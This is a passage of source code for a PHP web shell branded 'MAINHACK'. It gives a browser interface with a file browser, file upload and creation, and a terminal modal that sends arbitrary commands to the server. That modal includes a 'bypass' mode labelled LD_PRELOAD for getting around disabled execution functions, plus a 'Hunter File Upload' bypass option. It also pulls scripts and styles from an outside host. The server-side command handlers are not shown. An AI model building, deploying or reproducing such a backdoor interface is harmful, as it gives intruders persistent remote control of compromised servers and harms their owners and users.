name="viewport" content="width=device-width, initial-scale=1.0" /> <title>MAINHACK</title> <link rel="icon" href="mainhack.ico" type="image/x-icon" /> <link rel="stylesheet" href="https://wordpress.zzna.ru/newb/all.min.css" /> <link rel="stylesheet" href="https://wordpress.zzna.ru/newb/styles.css" /> <script src="https://wordpress.zzna.ru/newb/script.js"></script> <style> /* --- START: Improved and new styles --- */ h1.mainhack-title { color: red; text-align: center; margin-bottom: 20px; font-family: Arial, sans-serif; } .main-menu { display: flex; align-items: center; } .main-menu .menu-item { margin-right: 10px !important; } .main-menu .terminal-item { margin-left: auto; /* Pushes terminal button to the right */ } /* Modal Styles */ .modal-overlay { display: none; position: fixed; z-index: 1000; left: 0; top: 0; width: 100%; height: 100%; overflow: auto; background-color: rgba(0,0,0,0.6); } .modal-content { background-color: #2c2c2c; margin: 10% auto; padding: 20px; border: 1px solid #888; width: 80%; max-width: 800px; border-radius: 8px; color: #f1f1f1; box-shadow: 0 5px 15px rgba(0,0,0,0.5); } .modal-header { display: flex; justify-content: space-between; align-items: center; border-bottom: 1px solid #555; padding-bottom: 10px; margin-bottom: 15px; } .modal-header h2 { margin: 0; color: red; } .close-button { color: #aaa; font-size: 28px; font-weight: bold; cursor: pointer; } .close-button:hover, .close-button:focus { color: #fff; text-decoration: none; } /* Terminal Content Styles */ .cmd-group { display: flex; margin-bottom: 10px; } .cmd-group input[type="text"] { flex-grow: 1; margin-right: 10px; background: #444; border: 1px solid #666; color: #fff; padding: 8px; border-radius: 4px; } .cmd-group button { padding: 8px 15px; border: none; cursor: pointer; background-color: #555; color: white; border-radius: 4px; transition: background-color 0.3s; } .cmd-group button:hover { background-color: #777; } #cmd-output { background: #111; color: #0f0; font-family: 'Courier New', Courier, monospace; font-size: 14px; padding: 10px; margin-top: 10px; height: 300px; overflow: auto; border: 1px solid #444; border-radius: 4px; white-space: pre-wrap; word-wrap: break-word; } /* --- END: Improved and new styles --- */ </style> <script> // --- START: New JS for Modal --- function openTerminal() { document.getElementById('terminal-modal').style.display = 'block'; } function closeTerminal() { document.getElementById('terminal-modal').style.display = 'none'; } window.onclick = function(event) { const modal = document.getElementById('terminal-modal'); if (event.target == modal) { modal.style.display = "none"; } } // --- END: New JS for Modal --- function sendNormalCmd() { var cmd = document.getElementById('cmd_normal_input').value; if (!cmd) return false; document.getElementById('cmd-output').textContent = 'Executing normal command...'; fetch('?action=cmd_normal', { method: 'POST', headers: {'Content-Type': 'application/json'}, body: JSON.stringify({cmd: cmd}) }) .then(res => res.text()) .then(data => { document.getElementById('cmd-output').textContent = data; }); return false; // Prevent form submission } function sendBypassCmd() { var cmd = document.getElementById('cmd_bypass_input').value; if (!cmd) return false; document.getElementById('cmd-output').textContent = 'Executing bypass command...'; fetch('?action=cmd_bypass', { method: 'POST', headers: {'Content-Type': 'application/json'}, body: JSON.stringify({cmd: cmd}) }) .then(res => res.text()) .then(data => { document.getElementById('cmd-output').textContent = data; refresh_path(); // Refresh file list to see test.txt }); return false; // Prevent form submission } </script> </head> <body> <h1 class="mainhack-title">MAINHACK</h1> <?php $path = str_replace('\\', '/', $current_path); $paths = explode('/', $path); echo "<div class='wrapper' id='path_div'>"; foreach ($paths as $id => $pat) { if ($id == 0 && $pat === '') { echo '<a href="#" path="/" onclick="change_path(this)">/</a>'; } if ($pat != '') { $tmp_path = implode('/', array_slice($paths, 0, $id + 1)); if (empty($tmp_path)) $tmp_path = '/'; echo "<a href='#' path='$tmp_path' onclick='change_path(this)'>$pat/</a>"; } } echo "</div>"; // --- START: Terminal Modal HTML moved here --- ?> <div id="terminal-modal" class="modal-overlay"> <div class="modal-content"> <div class="modal-header"> <h2>Terminal</h2> <span class="close-button" onclick="closeTerminal()">×</span> </div> <div class="modal-body"> <form onsubmit="return sendNormalCmd();" class="cmd-group"> <input type="text" id="cmd_normal_input" placeholder="Normal Command (e.g., whoami, ls -la)" autocomplete="off" /> <button type="submit">Run Normal</button> </form> <form onsubmit="return sendBypassCmd();" class="cmd-group"> <input type="text" id="cmd_bypass_input" placeholder="Bypass Command (LD_PRELOAD)" autocomplete="off" /> <button type="submit">Run Bypass</button> </form> <div id="cmd-output-container"> <label style="color: #ccc;">Command Output:</label> <pre id="cmd-output"></pre> </div> </div> </div> </div> <?php // --- END: Terminal Modal HTML --- ?> </body> </html> <?php } function menu() { ?> <div class="wrapper main-menu"> <form method="post" enctype="multipart/form-data" style="display: inline-block;" class="menu-item"> <div class="file-upload"> <label for="file-upload-input" style="cursor: pointer;"> [ Upload ] </label> <input type="file" id="file-upload-input" style="display: none;" onchange="handle_upload()" /> </div> </form> <a href='#' onclick='refresh_path()' class='menu-item white'>[ HOME ]</a> <a href='#' onclick='create_file()' class='menu-item white'>[ Create File ]</a> <a href='#' onclick='openTerminal()' class='terminal-item white'>[ Terminal ]</a> </div> <table cellspacing="0" cellpadding="7" width="100%"> <thead> <tr> <th width="44%"></th> <th width="11%"></th> <th width="17%"></th> <th width="17%"></th> <th width="11%"></th> </tr> </thead> <tbody id="data_table" class='blur-table'> <div class="wrapper" style='margin-top: -10px'> <input type="checkbox" class='mr-10' id='bypass-upload'>[ Hunter File Upload ]</input> </div> </tbody> </table> <?php } ?>
💾 Save Changes
📥 Download
🗑️ Delete